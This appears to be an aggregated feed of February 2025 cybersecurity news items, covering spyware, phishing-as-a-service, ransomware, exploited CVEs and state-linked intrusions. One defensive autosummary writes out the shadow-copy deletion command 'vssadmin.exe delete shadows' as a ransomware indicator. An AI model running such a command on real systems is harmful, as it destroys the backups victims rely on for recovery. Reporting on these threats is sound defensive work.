    Cybersecurity researchers have flagged an updated version of the LightSpy implant that comes equipped with an expanded set of data collection features to extract information from social media platforms like Facebook and Instagram. LightSpy is the name given to a modular spyware that's capable of infecting both Windows and Apple systems with an aim to harvest data. It was first documented in

    Autosummary: This includes Wi-Fi network information, screenshots, location, iCloud Keychain, sound recordings, photos, browser history, contacts, call history, and SMS messages, and data from various apps like Files, LINE, Mail Master, Telegram, Tencent QQ, WeChat, and WhatsApp.


    Belarus-Linked Ghostwriter Uses Macropack-Obfuscated Excel Macros to Deploy Malware

    exploits
    2025-02-25 https://thehackernews.com/2025/02/belarus-linked-ghostwriter-uses.html
    Opposition activists in Belarus as well as Ukrainian military and government organizations are the target of a new campaign that employs malware-laced Microsoft Excel documents as lures to deliver a new variant of PicassoLoader. The threat cluster has been assessed to be an extension of a long-running campaign mounted by a Belarus-aligned threat actor dubbed Ghostwriter (aka Moonscape,

    Autosummary: The threat cluster has been assessed to be an extension of a long-running campaign mounted by a Belarus-aligned threat actor dubbed Ghostwriter (aka Moonscape, TA445, UAC-0057, and UNC1151) since 2016.


    Have I Been Pwned adds 284M accounts stolen by infostealer malware

    exploits
    2025-02-25 https://www.bleepingcomputer.com/news/security/have-i-been-pwned-adds-284m-accounts-stolen-by-infostealer-malware/
    The Have I Been Pwned data breach notification service has added over 284 million accounts stolen by information stealer malware and found on a Telegram channel. [...]



    Firefox continues Manifest V2 support as Chrome disables MV2 ad-blockers

    ransomware
    2025-02-25 https://www.bleepingcomputer.com/news/security/firefox-continues-manifest-v2-support-as-chrome-disables-mv2-ad-blockers/
    Mozilla has renewed its promise to continue supporting Manifest V2 extensions alongside Manifest V3, giving users the freedom to use the extensions they want in their browser. [...]

    Autosummary: Specifically, the internet company said it would continue to support both the "blockingWebRequest" and "declarativeNetRequest" APIs, corresponding to MV3 and MV2, respectively, allowing extensions like uBlock Origin to continue working as usual.


    LockBit taunts FBI Director Kash Patel with alleged “Classified” leak threat

    ransomware
    2025-02-25 https://securityaffairs.com/174639/cyber-crime/lockbit-taunts-fbi-director-kash-patel.html
    LockBit claims to have “classified information” for FBI Director Kash Patel that could “destroy” the agency if leaked. The ransomware gang LockBit sent a strange message to newly appointed FBI Director Kash Patel, offering alleged “classified information” that could “destroy” the agency if publicly disclosed. The ransomware group published the message on their dark […]

    Autosummary: "My business, from which I have paid so much tax, post-paid pentest, I created only to make us all, in our United States of America, a more secure place to live.


    Chile power cut leaves millions without electricity

    latam government
    2025-02-25 https://www.bbc.com/news/articles/crmj7vkyr78o
    Media reports say some power has been restored in parts of the capital, Santiago.

    Autosummary: Reuters news agency reported that the world's largest copper mine, Escondida, was without power, citing a source close to the matter.


    ⚡ THN Weekly Recap: From $1.5B Crypto Heist to AI Misuse & Apple’s Data Dilemma

    Linux
    2025-02-24 https://thehackernews.com/2025/02/thn-weekly-recap-from-15b-crypto-heist.html
    Welcome to your weekly roundup of cyber news, where every headline gives you a peek into the world of online battles. This week, we look at a huge crypto theft, reveal some sneaky AI scam tricks, and discuss big changes in data protection. Let these stories spark your interest and help you understand the changing threats in our digital world. ⚡ Threat of the Week Lazarus Group Linked to

    Autosummary: This week's list includes — CVE-2025-24989 (Microsoft Power Pages), CVE-2025-23209 (Craft CMS), CVE-2024-12284 (Citrix NetScaler Console and NetScaler Agent), CVE-2025-26465, CVE-2025-26466 (OpenSSH), CVE-2025-21589 (Juniper Networks Session Smart Router), CVE-2024-12510, CVE-2024-12511 (Xerox VersaLink C7025 Multifunction printer), CVE-2025-0366 (Jupiter X Core plugin), CVE-2024-50379, CVE-2024-56337, CVE-2024-52316, CVE-2024-50379, CVE-2024-56337 (Atlassian), CVE-2024-53900, CVE-2025-23061 (Mongoose library), CVE-2025-26776 (NotFound Chaty Pro plugin), CVE-2025-26763 (MetaSlider Responsive Slider by MetaSlider plugin), CVE-2024-54756 (ZDoom Team GZDoom), CVE-2024-57401 (Uniclare Student Portal), CVE-2025-20059 (Ping Identity PingAM Java Policy Agent), CVE-2025-0868 (DocsGPT), CVE-2025-1023, CVE-2025-1132, CVE-2025-1133, CVE-2025-1134, CVE-2025-1135 (ChurchCRM), CVE-2024-57045 (D-Link DIR-859 router), CVE-2024-57050 (TP-Link WR840N v6 router), CVE-2024-57049 (TP-Link Archer c20 router), CVE-2025-26794 (Exim), CVE-2024-50608, CVE-2024-50609 (Fluent Bit), CVE-2024-54961 (Nagios XI), CVE-2025-23115, and CVE-2025-23116 (Ubiquiti UniFi Protect Camera). "The new confirmed detections, involving known variants of Pegasus from 2021-2023, include attacks against users across government, finance, logistics, and real estate industries," iVerify said, adding in about half the cases, the victims did not receive any Threat Notifications from Apple. The spyware, codenamed Spyrtacus, can steal text messages, instant messaging chats, contacts, call logs, ambient audio, and images, among others. Winnti Stages RevivalStone Campaign Targeting Japan — Winnti, a subgroup with the APT41 Chinese threat activity cluster, targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024 that delivered a wide range of malware, including a rootkit that's capable of intercepting TCP/IP Network Interface, as well as creating covert channels with infected endpoints within the intranet. This included a network likely originating from China that used its artificial intelligence (AI) models to develop a suspected surveillance tool that's designed to ingest and analyze posts and comments from platforms such as X, Facebook, YouTube, Instagram, Telegram, and Reddit. Two Estonian Nationals Plead Guilty in $577M Cryptocurrency Fraud Scheme — Two Estonian nationals, Sergei Potapenko and Ivan Turõgin, both 40, have pleaded guilty for the operation of a massive, multi-faceted cryptocurrency Ponzi scheme that claimed hundreds of thousands of people from across the world, including in the U.S. 📰 Around the Cyber World U.S. Army Soldier Pleads Guilty to AT&T and Verizon Hacks — Cameron John Wagenius (aka Kiberphant0m), a 20-year-old U.S. Army soldier, who was arrested early last month over AT&T and Verizon hacking, has pleaded guilty to two counts of unlawful transfer of confidential phone records information in 2024. The incident makes it the biggest-ever cryptocurrency heist reported to date, dwarfing that of Ronin Network ($624 million), Poly Network ($611 million), and BNB Bridge ($586 million).


    Becoming Ransomware Ready: Why Continuous Validation Is Your Best Defense

    exploits ransomware
    2025-02-24 https://thehackernews.com/2025/02/becoming-ransomware-ready-why.html
    Ransomware doesn’t hit all at once—it slowly floods your defenses in stages. Like a ship subsumed with water, the attack starts quietly, below the surface, with subtle warning signs that are easy to miss. By the time encryption starts, it’s too late to stop the flood. Each stage of a ransomware attack offers a small window to detect and stop the threat before it’s too late. The problem is

    Autosummary: Disabling Security Defenses To ensure uninterrupted encryption and prevent data recovery attempts during the attack, ransomware attempts to shut down security services such as: ✔ Antivirus & EDR (Endpoint Detection and Response) ✔ Backup agents ✔ Database systems 💡 How it works: Attackers use administrative commands or APIs to disable services like Windows Defender and backup solutions. 💡 How it works: Ransomware executes commands like: powershell vssadmin.exe delete shadows By wiping these backups, attackers ensure total data lockdown, increasing pressure on victims to pay the ransom. Indicators of Compromise (IOCs): What to Look Out For If you detect shadow copy deletions, process injections, or security service terminations, you may already be in the pre-encryption phase - but detecting these IOCs is a critical step to prevent the attack from unfolding. Let's unpack the stages of a ransomware attack, how to stay resilient amidst constantly morphing indicators of compromise (IOCs), and why constant validation of your defense is a must to stay resilient. 💡 Defensive trick: Some security tools preemptively create mutexes associated with known ransomware strains, tricking the malware into thinking it's already active - causing it to self-terminate.


    SpyLend Android malware found on Google Play enabled financial cyber crime and extortion

    financial exploits
    2025-02-24 https://securityaffairs.com/174540/malware/spylend-android-malware-100k-downloard.html
    CYFIRMA researchers discovered that the SpyLend Android malware was downloaded 100,000 times from the official app store Google Play. CYFIRMA researchers discovered an Android malware, named SpyLend, which was distributed through Google Play as Finance Simplified. The malware targets Indian users with unauthorized loan apps, enabling predatory lending, blackmail, and extortion. The Finance Simplified app […]

    Autosummary: Initially presented as a harmless Finance management application, it downloads a fraud loan app from an external download URL, which once installed, gains extensive permissions to access sensitive data, including files, contacts, call logs, SMS, clipboard content, and even the camera.” concludes the report.


    Exploits for unpatched Parallels Desktop flaw give root on Macs

    exploits
    2025-02-24 https://www.bleepingcomputer.com/news/security/exploits-for-unpatched-parallels-desktop-flaw-give-root-on-macs/
    Two different exploits for an unpatched Parallels Desktop privilege elevation vulnerability have been publicly disclosed, allowing users to gain root access on impacted Mac devices. [...]

    Autosummary: By manipulating the "do_repack_manual" function, an attacker redirects a privileged folder using symlinks, tricks Parallels into writing attacker-controlled files to a root-owned path, and replaces "p7z_tool," which gets executed as root.


    PoC exploit for Ivanti Endpoint Manager vulnerabilities released (CVE-2024-13159)

    exploits
    2025-02-24 https://www.helpnetsecurity.com/2025/02/24/poc-exploit-for-ivanti-endpoint-manager-vulnerabilities-released-cve-2024-13159/

    A proof-of-concept (PoC) exploit for four critical Ivanti Endpoint Manager vulnerabilities has been released by Horizon3.ai researchers. The vulnerabilities – CVE-2024-10811, CVE-2024-13161, CVE-2024-13160 and CVE-2024-13159 – may be exploited by remote, unauthenticated attackers to leverage Ivanti EPM machine account credentials for relay attacks and, ultimately, to compromise the Ivanti EPM server. “Compromising the Endpoint Manager server itself would lead to the ability to compromise all of the EPM clients, making this avenue especially impactful,” Horizon3.ai … More

    The post PoC exploit for Ivanti Endpoint Manager vulnerabilities released (CVE-2024-13159) appeared first on Help Net Security.




    Australia bans all Kaspersky products on government systems

    government
    2025-02-24 https://www.bleepingcomputer.com/news/security/australia-bans-all-kaspersky-products-on-government-systems/
    The Australian government has banned all Kaspersky Lab products and web services from its systems and devices following an analysis that claims the company poses a significant security risk to the country. [...]



    New Malware Campaign Uses Cracked Software to Spread Lumma and ACR Stealer

    exploits
    2025-02-24 https://thehackernews.com/2025/02/new-malware-campaign-uses-cracked.html
    Cybersecurity researchers are warning of a new campaign that leverages cracked versions of software as a lure to distribute information stealers like Lumma and ACR Stealer. The AhnLab Security Intelligence Center (ASEC) said it has observed a spike in the distribution volume of ACR Stealer since January 2025. A notable aspect of the stealer malware is the use of a technique called dead drop

    Autosummary: ACR Stealer, previously distributed via Hijack Loader malware, is capable of harvesting a wide range of information from compromised systems, including files, web browser data, and cryptocurrency wallet extensions.


    Russia warns financial sector of major IT service provider hack

    financial Telcos
    2025-02-24 https://www.bleepingcomputer.com/news/security/russia-warns-financial-sector-of-major-it-service-provider-hack/
    Russia's National Coordination Center for Computer Incidents (NKTsKI) is warning organizations in the country's credit and financial sector about a breach at LANIT, a major Russian IT service and software provider. [...]



    Week in review: PostgreSQL 0-day exploited in US Treasury hack, top OSINT books to learn from

    exploits
    2025-02-23 https://www.helpnetsecurity.com/2025/02/23/week-in-review-postgresql-0-day-exploited-in-us-treasury-hack-top-osint-books-to-learn-from/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: A PostgreSQL zero-day was also exploited in US Treasury hack (CVE-2025-1094) The suspected Chinese state-sponsored hackers who breached workstations of several US Treasury employees in December 2024 did so by leveraging not one, but two zero-days, according to Rapid7 researchers. Unlocking OSINT: Top books to learn from Discover the top Open-Source Intelligence (OSINT) books in this curated list. Mastering the … More

    The post Week in review: PostgreSQL 0-day exploited in US Treasury hack, top OSINT books to learn from appeared first on Help Net Security.


    Autosummary: Darcula allows tech-illiterate crooks to create, deploy DIY phishing kits targeting any brand A new, improved version of Darcula, a cat-themed phishing-as-a-service (PhaaS) platform aimed at serving Chinese-speaking criminals, will be released this month and will allow malicious users to create customized phishing kits to target a wider variety of brands than ever before, Netcraft researchers are warning. Mastering the cybersecurity tightrope of protection, detection, and response In this Help Net Security interview, Chester Wisniewski, Director and Global Field CISO at Sophos, discusses the shifting ransomware landscape, the risks posed by quantum decryption threats, and the role of vendor security validation.


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 34

    exploits
    2025-02-23 https://securityaffairs.com/174534/uncategorized/security-affairs-malware-newsletter-round-34.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. You’ve Got Malware: FINALDRAFT Hides in Your Drafts   Telegram Abused as C2 Channel for New Golang Backdoor   Infostealing Malware Infections in the U.S. Military & Defense Sector: A Cybersecurity Disaster in the Making   Analyzing ELF/Sshdinjector.A!tr with […]



    U.S. CISA adds Microsoft Power Pages flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-02-23 https://securityaffairs.com/174541/hacking/u-s-cisa-adds-microsoft-power-pages-flaw-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Power Pages vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Microsoft Power Pages vulnerability, tracked as CVE-2025-24989, to its Known Exploited Vulnerabilities (KEV) catalog. CVE-2025-24989 (CVSS score: 8.2) is an improper access control flaw in Power Pages, an unauthorized […]



    Beware: PayPal "New Address" feature abused to send phishing emails

    financial
    2025-02-22 https://www.bleepingcomputer.com/news/security/beware-paypal-new-address-feature-abused-to-send-phishing-emails/
    An ongoing PayPal email scam exploits the platform’s address settings to send fake purchase notifications, tricking users into granting remote access to scammers [...]

    Autosummary: An ongoing PayPal email scam exploits the platform’s address settings to send fake purchase notifications, tricking users into granting remote access to scammers. For the past month, BleepingComputer and others [1, 2] have received emails from PayPal stating, "You added a new address." When they add the scam address to PayPal, the payment platform will email a confirmation to the threat actor’s email, which will then forward it to the Microsoft 365 account, which then forwards it to everyone on the mailing list, as shown in the flow chart below.


    Mastering the cybersecurity tightrope of protection, detection, and response

    ciber
    2025-02-21 https://www.helpnetsecurity.com/2025/02/21/chester-wisniewski-sophos-threats-strategy-response/

    In this Help Net Security interview, Chester Wisniewski, Director and Global Field CISO at Sophos, discusses the shifting ransomware landscape, the risks posed by quantum decryption threats, and the role of vendor security validation. Wisniewski notes that cyber resilience is more crucial than mere defense, with AI playing a key role in managing threats, and calls for ongoing improvements, transparency, and proactive measures. With ransomware payments decreasing, some cybercriminals are shifting toward data-centric extortion rather …

    Autosummary: In this Help Net Security interview, Chester Wisniewski, Director and Global Field CISO at Sophos, discusses the shifting ransomware landscape, the risks posed by quantum decryption threats, and the role of vendor security validation. Wisniewski notes that cyber resilience is more crucial than mere defense, with AI playing a key role in managing threats, and calls for ongoing improvements, transparency, and proactive measures. That isn’t to say we shouldn’t be migrating to quantum resistant cryptography as soon as we possibly can, as those same cybercriminals, if they gain the ability in the future, will likely steal things like encrypted backups and still attempt using them for extortion.


    Symbiotic Security improves software vulnerability detection in the coding process

    exploits industry
    2025-02-21 https://www.helpnetsecurity.com/2025/02/21/symbiotic-security-ide-extension-update/

    Symbiotic Security announced updates to its application and integrated development environment (IDE) extension, further streamlining security for developers by improving usability, accessibility, and real-time security insights. The demand for real-time security solutions is growing as organizations seek to shift security left – making it an earlier part of the software development process to improve efficiency and reduce cost. Symbiotic Security’s software helps developers and security teams proactively manage risk. The latest update empowers developers and …

    Autosummary: This includes just-in-time training, links to resources, and examples of vulnerable code to illustrate different use cases. This announcement comes on the heels of Symbiotic Security’s November launch, when the company introduced the industry’s first real-time security solution for software development, combining detection, remediation, and just-in-time training.


    Cisco Confirms Salt Typhoon Exploited CVE-2018-0171 to Target U.S. Telecom Networks

    exploits Telcos
    2025-02-21 https://thehackernews.com/2025/02/cisco-confirms-salt-typhoon-exploited.html
    Cisco has confirmed that a Chinese threat actor known as Salt Typhoon gained access by likely abusing a known security flaw tracked as CVE-2018-0171, and by obtaining legitimate victim login credentials as part of a targeted campaign aimed at major U.S. telecommunications companies. "The threat actor then demonstrated their ability to persist in target environments across equipment from multiple

    Autosummary: "In addition, we have observed the threat actor capturing SNMP, TACACS, and RADIUS traffic, including the secret keys used between network devices and TACACS/RADIUS servers," Talos noted.


    CISA Flags Craft CMS Vulnerability CVE-2025-23209 Amid Active Attacks

    exploits
    2025-02-21 https://thehackernews.com/2025/02/cisa-flags-craft-cms-vulnerability-cve.html
    A high-severity security flaw impacting the Craft content management system (CMS) has been added by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability in question is CVE-2025-23209 (CVSS score: 8.1), which impacts Craft CMS versions 4 and 5. It was addressed by the


    U.S. CISA adds Craft CMS and Palo Alto Networks PAN-OS flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-02-21 https://securityaffairs.com/174483/security/u-s-cisa-adds-craft-cms-palo-alto-networks-pan-os-flaws-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Craft CMS and Palo Alto Networks PAN-OS vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SonicWall SonicOS and Palo Alto PAN-OS vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The two vulnerabilities are: Craft is a flexible, user-friendly CMS, affected […]

    Autosummary: The two vulnerabilities are: CVE-2025-23209, Craft CMS Code Injection Vulnerability; CVE-2025-0111, Palo Alto Networks PAN-OS File Read Vulnerability. Craft is a flexible, user-friendly CMS, affected by a code injection vulnerability, tracked as CVE-2025-23209 (CVSS score of 8.1), which could lead to remote code execution (RCE).


    Cybercriminals Can Now Clone Any Brand’s Site in Minutes Using Darcula PhaaS v3

    ciber
    2025-02-21 https://thehackernews.com/2025/02/cybercriminals-can-now-clone-any-brands.html
    The threat actors behind the Darcula phishing-as-a-service (PhaaS) platform appear to be readying a new version that allows prospective customers and cyber crooks to clone any brand’s legitimate website and create a phishing version, further bringing down the technical expertise required to pull off phishing attacks at scale. The latest iteration of the phishing suite "represents a significant

    Autosummary: The latest iteration of the phishing suite "represents a significant shift in criminal capabilities, reducing the barrier to entry for bad actors to target any brand with complex, customizable phishing campaigns," Netcraft said in a new analysis.


    Apple pulls data protection tool after UK government security row

    government
    2025-02-21 https://www.bbc.com/news/articles/cgj54eq4vejo
    Customers’ photos and documents stored online will no longer be protected by end-to-end encryption.

    Autosummary: Prof Alan Woodward - a cyber-security expert at Surrey University - said it was a "very disappointing development" which amounted to "an act of self harm" by the government.


    SpyLend Android malware downloaded 100,000 times from Google Play

    exploits
    2025-02-21 https://www.bleepingcomputer.com/news/security/spylend-android-malware-downloaded-100-000-times-from-google-play/
    An Android malware app called SpyLend has been downloaded over 100,000 times from Google Play, where it masqueraded as a financial tool but became a predatory loan app for those in India. [...]

    Autosummary: However, upon installation, they request excessive permissions, allowing the apps to steal personal data such as contacts, call logs, SMS messages, photos, and device location.


    CISA flags Craft CMS code injection flaw as exploited in attacks

    exploits
    2025-02-21 https://www.bleepingcomputer.com/news/security/cisa-flags-craft-cms-code-injection-flaw-as-exploited-in-attacks/
    The U.S. Cybersecurity & Infrastructure Security Agency (CISA) warns that a Craft CMS remote code execution flaw is being exploited in attacks. [...]


    Elon Musk waves "bureaucracy chainsaw" gifted by Argentina

    latam
    2025-02-21 https://www.bbc.com/news/videos/crmj284d0k8o
    Argentina’s president gifted Elon Musk a chainsaw to symbolise cuts to bureaucracy.


    Smashing Security podcast #405: A crypto con exchange, and soaring ticket scams

    financial
    2025-02-20 https://grahamcluley.com/smashing-security-podcast-405/
    From shadowy Bitcoin exchanges to Interpol’s most wanted, Alexander Vinnik was the alleged kingpin behind BTC-e, a $4bn crypto laundering empire. Learn more about him, and how he became a geopolitical pawn between the US, France, and Russia. Plus! Hear how concert-goers are being warned about a swathe of scams hitting stadiums and arenas around the world. All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault. Plus don’t miss our featured interview with Cliff Crosland of Scanner.dev.

    Autosummary: Hosts: Graham Cluley (@grahamcluley.com) and Carole Theriault (@caroletheriault). Sponsored by 1Password – Secure every app, device, and identity – even the unmanaged ones at 1password.com/smashing.


    300% increase in endpoint malware detections

    exploits
    2025-02-20 https://www.helpnetsecurity.com/2025/02/20/endpoint-malware-increase-watchguard-q3-2024-internet-security-report/

    The third quarter of 2024 saw a dramatic shift in the types of malware detected at network perimeters, according to a new WatchGuard report. The report’s key findings include a 300% increase quarter over quarter of endpoint malware detections, highlighted by growing threats that exploit legitimate websites or documents for malicious purposes as threat actors turn to more social engineering tactics to execute their attacks. While Microsoft documents like Word and Excel have long been …

    Autosummary: The report’s key findings include a 300% increase quarter over quarter of endpoint malware detections, highlighted by growing threats that exploit legitimate websites or documents for malicious purposes as threat actors turn to more social engineering tactics to execute their attacks.


    Citrix Releases Security Fix for NetScaler Console Privilege Escalation Vulnerability

    exploits
    2025-02-20 https://thehackernews.com/2025/02/citrix-releases-security-fix-for.html
    Citrix has released security updates for a high-severity security flaw impacting NetScaler Console (formerly NetScaler ADM) and NetScaler Agent that could lead to privilege escalation under certain conditions. The vulnerability, tracked as CVE-2024-12284, has been given a CVSS v4 score of 8.8 out of a maximum of 10.0. It has been described as a case of improper privilege management that could


    Microsoft Patches Actively Exploited Power Pages Privilege Escalation Vulnerability

    exploits
    2025-02-20 https://thehackernews.com/2025/02/microsoft-patches-actively-exploited.html
    Microsoft has released security updates to address two Critical-rated flaws impacting Bing and Power Pages, including one that has come under active exploitation in the wild. The vulnerabilities are listed below: CVE-2025-21355 (CVSS score: 8.6), Microsoft Bing Remote Code Execution Vulnerability; CVE-2025-24989 (CVSS score: 8.2), Microsoft Power Pages Elevation of Privilege Vulnerability.


    Palo Alto Networks warns that CVE-2025-0111 flaw is actively exploited in attacks

    exploits
    2025-02-20 https://securityaffairs.com/174409/hacking/palo-alto-networks-cve-2025-0111-actively-exploited.html
    Palo Alto Networks warns that the vulnerability CVE-2025-0111 is actively exploited with two other flaws to compromise PAN-OS firewalls. Palo Alto Networks warns that threat actors are chaining the vulnerability CVE-2025-0111 with two other vulnerabilities, tracked as CVE-2025-0108 and CVE-2024-9474, to compromise PAN-OS firewalls. The vulnerability CVE-2025-0111 is a file read issue in PAN-OS, an […]

    Autosummary: By Pierluigi Paganini, February 20, 2025. Palo Alto Networks warns that the vulnerability CVE-2025-0111 is actively exploited with two other flaws to compromise PAN-OS firewalls. Palo Alto Networks warns that threat actors are chaining the vulnerability CVE-2025-0111 with two other vulnerabilities, tracked as CVE-2025-0108 and CVE-2024-9474, to compromise PAN-OS firewalls.


    New NailaoLocker ransomware used against EU healthcare orgs

    exploits ransomware
    2025-02-20 https://www.bleepingcomputer.com/news/security/new-nailaolocker-ransomware-used-against-eu-healthcare-orgs/
    A previously undocumented ransomware payload named NailaoLocker has been spotted in attacks targeting European healthcare organizations between June and October 2024. [...]

    Autosummary: Orange has shared several hypotheses for the attacks, including false flag operations meant to distract, strategic data theft operations doubled with revenue generation, and, more likely, a Chinese cyberespionage group "moonlighting" on the side to earn some money.


    Norton’s AI-powered features defend against scams and social engineering threats

    financial
    2025-02-20 https://www.helpnetsecurity.com/2025/02/20/norton-scam-protection/

    Norton is setting the standard for scam protection with a new range of AI-powered features fully integrated in Norton Cyber Safety products to help protect people from the most widespread cyberthreat of our time. Like the first domino tipping over and setting off a chain reaction, scams are the initial event that can trigger a series of serious attacks, including identity theft and financial fraud. The Company reports that 90% of all cyberthreats now originate …

    Autosummary: In addition to Genie Scam Protection, Norton 360 with LifeLock customers also have Genie Scam Protection Pro, which includes Safe Call: uses AI to automatically block scam calls, or labels incoming calls as scam, junk, or as a business, so people know if they should answer. Available starting today in the US across the Norton Cyber Safety product lineup, Genie Scam Protection and Genie Scam Protection Pro provide AI protection in all the usual hotbeds for scams: texts, phone calls, emails, and web.


    Microsoft fixes Power Pages zero-day bug exploited in attacks

    exploits
    2025-02-20 https://www.bleepingcomputer.com/news/security/microsoft-fixes-power-pages-zero-day-bug-exploited-in-attacks/
    Microsoft has issued a security bulletin for a high-severity elevation of privilege vulnerability in Power Pages, which hackers exploited as a zero-day in attacks. [...]

    Autosummary: Microsoft Power Pages is a low-code, SaaS-based web development platform that allows users to create, host, and manage secure external-facing business websites.


    Microsoft testing fix for Windows 11 bug breaking SSH connections

    exploits
    2025-02-20 https://www.bleepingcomputer.com/news/microsoft/microsoft-testing-fix-for-windows-11-bug-breaking-ssh-connections/
    Microsoft is now testing a fix for a longstanding known issue that is breaking SSH connections on some Windows 11 22H2 and 23H2 systems. [...]

    Autosummary: In related news, the OpenSSH project has released security updates for two vulnerabilities: a man-in-the-middle (MitM) flaw (CVE-2025-26465) and a denial-of-service bug (CVE-2025-26466).


    Darcula PhaaS can now auto-generate phishing kits for any brand

    financial
    2025-02-20 https://www.bleepingcomputer.com/news/security/darcula-phaas-can-now-auto-generate-phishing-kits-for-any-brand/
    The Darcula phishing-as-a-service (PhaaS) platform is preparing to release its third major version, with one of the highlighted features being the ability to create do-it-yourself phishing kits to target any brand. [...]

    Autosummary: In addition to this new feature, the upcoming release, named "Darcula Suite," also lowers the technical skill requirements and adds a new user-friendly admin dashboard, IP and bot filtering, campaign performance measurement, and automated credit card theft/digital wallet loading.


    Darcula allows tech-illiterate crooks to create, deploy DIY phishing kits targeting any brand

    financial
    2025-02-20 https://www.helpnetsecurity.com/2025/02/20/darcula-allows-tech-illiterate-crooks-to-create-deploy-diy-phishing-kits-targeting-any-brand/

    A new, improved version of Darcula, a cat-themed phishing-as-a-service (PhaaS) platform aimed at serving Chinese-speaking criminals, will be released this month and will allow malicious users to create customized phishing kits to target a wider variety of brands than ever before, Netcraft researchers are warning. Even users who have gotten wise to the fake “missed package” or “package confirmation” notices from their national post or delivery services may not be ready for the variety of phishing …

    Autosummary: Citing SecAlliance security researcher Ford Merrill, Krebs further described how criminals then used those cards/wallets to steal money by: setting up fake e-commerce businesses on Stripe or Zelle and making transactions through them; performing “tap-to-pay” on point-of-sale (PoS) terminals they’ve obtained; and using an Android app that can relay valid NFC-enabled tap-to-pay transactions from phones located across the globe, either to pay via a PoS terminal or take money out of ATMs.


    North Korean Hackers Target Freelance Developers in Job Scam to Deploy Malware

    financial exploits
    2025-02-20 https://thehackernews.com/2025/02/north-korean-hackers-target-freelance.html
    Freelance software developers are the target of an ongoing campaign that leverages job interview-themed lures to deliver cross-platform malware families known as BeaverTail and InvisibleFerret. The activity, linked to North Korea, has been codenamed DeceptiveDevelopment, which overlaps with clusters tracked under the names Contagious Interview (aka CL-STA-0240), DEV#POPPER, Famous Chollima,

    Autosummary: InvisibleFerret is a modular Python malware that retrieves and executes three additional components: pay, which collects information and acts as a backdoor that’s capable of accepting remote commands from an attacker-controlled server to log keystrokes, capture clipboard content, run shell commands, exfiltrate files and data from mounted drives, as well as install the AnyDesk and browser module, and gather information from browser extensions and password managers; bow, which is responsible for stealing login data, autofill data, and payment information stored in Chromium-based browsers like Chrome, Brave, Opera, Yandex, and Edge; and adc, which functions as a persistence mechanism by installing the AnyDesk remote desktop software. ESET said the primary targets of the campaign are software developers working in cryptocurrency and decentralized finance projects across the world, with significant concentrations reported in Finland, India, Italy, Pakistan, Spain, South Africa, Russia, Ukraine, and the U.S. "The attackers don’t distinguish based on geographical location and aim to compromise as many victims as possible to increase the likelihood of successfully extracting funds and information."


    China-Linked Attackers Exploit Check Point Flaw to Deploy ShadowPad and Ransomware

    exploits ransomware
    2025-02-20 https://thehackernews.com/2025/02/chinese-linked-attackers-exploit-check.html
    A previously unknown threat activity cluster targeted European organizations, particularly those in the healthcare sector, to deploy PlugX and its successor, ShadowPad, with the intrusions ultimately leading to deployment of a ransomware called NailaoLocker in some cases. The campaign, codenamed Green Nailao by Orange Cyberdefense CERT, involved the exploitation of a newly patched security flaw

    Autosummary: The intrusions culminate with the use of Windows Management Instrumentation (WMI) to transmit three files, a legitimate executable signed by Beijing Huorong Network Technology Co., Ltd ("usysdiag.exe"), a loader named NailaoLoader ("sensapi.dll"), and NailaoLocker ("usysdiag.exe.dat").


    Cybercriminals Use Eclipse Jarsigner to Deploy XLoader Malware via ZIP Archives

    exploits ciber
    2025-02-20 https://thehackernews.com/2025/02/cybercriminals-use-eclipse-jarsigner-to.html
    A malware campaign distributing the XLoader malware has been observed using the DLL side-loading technique by making use of a legitimate application associated with the Eclipse Foundation. "The legitimate application used in the attack, jarsigner, is a file created during the installation of the IDE package distributed by the Eclipse Foundation," the AhnLab Security Intelligence Center (ASEC)

    Autosummary: The South Korean cybersecurity firm said the malware is propagated in the form of a compressed ZIP archive that includes the legitimate executable as well as the DLLs that are sideloaded to launch the malware: Documents2012.exe, a renamed version of the legitimate jarsigner.exe binary; jli.dll, a DLL file that’s modified by the threat actor to decrypt and inject concrt140e.dll; and concrt140e.dll, the XLoader payload. The attack chain crosses over to the malicious phase when "Documents2012.exe" is run, triggering the execution of the tampered "jli.dll" library to load the XLoader malware.


    Microsoft fixed actively exploited flaw in Power Pages

    exploits
    2025-02-20 https://securityaffairs.com/174430/security/microsoft-fixed-actively-exploited-flaw-in-power-pages.html
    Microsoft addressed a privilege escalation vulnerability in Power Pages; the flaw is actively exploited in attacks. Microsoft has addressed two critical vulnerabilities, tracked as CVE-2025-21355 (CVSS score: 8.6) and CVE-2025-24989 (CVSS score: 8.2), respectively impacting Bing and Power Pages. CVE-2025-21355 is a missing authentication for critical function in Microsoft Bing; an unauthorized attacker could exploit the flaw […]


    AI cracks superbug problem in two days that took scientists years

    exploits
    2025-02-20 https://www.bbc.com/news/articles/clyz6e9edy3o
    The lead researcher has told the BBC he was so astounded he assumed his computer had been hacked.


    US healthcare org pays $11M settlement over alleged cybersecurity lapses

    ciber
    2025-02-20 https://www.bleepingcomputer.com/news/security/us-healthcare-org-pays-11m-settlement-over-alleged-cybersecurity-lapses/
    Health Net Federal Services (HNFS) and its parent company, Centene Corporation, have agreed to pay $11,253,400 to settle allegations that HNFS falsely certified compliance with cybersecurity requirements under its Defense Health Agency (DHA) TRICARE contract. [...]


    Chinese hackers use custom malware to spy on US telecom networks

    exploits Telcos
    2025-02-20 https://www.bleepingcomputer.com/news/security/salt-typhoon-uses-jumbledpath-malware-to-spy-on-us-telecom-networks/
